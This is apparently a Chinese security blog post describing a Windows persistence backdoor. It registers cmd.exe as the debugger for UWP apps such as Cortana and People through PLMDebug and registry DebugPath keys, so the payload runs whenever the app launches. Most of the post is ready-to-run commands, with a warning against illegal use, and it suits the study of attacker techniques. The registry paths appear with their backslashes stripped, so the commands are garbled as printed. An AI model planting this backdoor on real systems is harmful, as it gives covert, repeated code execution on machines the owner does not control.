声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!!!
START
0x01前言
0x02列出软件包名称
首先我们需要找出当前系统完整的软件包名称,因为后边PLMDebug调试时要用到,可以使用以下命令列出所有的软件包,这里仅显示name、packagefullname。
Get-AppxPackage | select name,packagefullname
0x03安装PLMDebug
PLMDebug.exe包含在Windows调试工具中,所以我们只需要安装Windows 10 SDK即可,安装过程中只要选择“Debugging Tools for Windows”这一项就好了。
0x04调试Cortana软件包
使用以下命令调试Cortana软件包,然后在开始菜单中打开Cortana,胡乱点一下,稍等片刻即可弹出cmd.exe。
plmdebug.exe /enabledebug Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy C:WindowsSystem32cmd.exe
0x05修改Cortana注册表
通过以下两条命令都可以实现持久化,方法都是一样的,只是注册表位置不一样,第一条会损坏原有的Cortana程序,无法正常运行,第二条不会损坏原有的Cortana程序,可以正常运行。修改以下注册表项时必须确定与你当前系统的UWP应用程序版本相对应,否则后门不会被触发。
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPackagedAppXDebugMicrosoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:WindowsSystem32cmd.exe"reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.People_10.1807.2131.0_x64__8wekyb3d8bbweDebugInformationx4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:WindowsSystem32cmd.exe"
Cortana(小娜):
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPackagedAppXDebugMicrosoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy /d "C:WindowsSystem32cmd.exe"reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewyDebugInformationCortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:WindowsSystem32cmd.exe"
注:笔者在当前测试环境下设置好了Cortana后门,在注销/重启系统登录时会执行1次,进入系统后每间隔5-20分钟左右会执行1次,这应该是微软后台自动运行了Cortana(小娜),所以会再次触发该后门,没有找到相关资料,具体原因不清楚,全靠猜,0.0 !!!
免费星球:要求每个人在两周内输出一篇文章发到星球里面,文章为星球成员自己整理的内容,如超过两周没有文章输出的将被拉黑一个月,超过3次将被踢出星球,永久禁止加入!
|
|
|
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论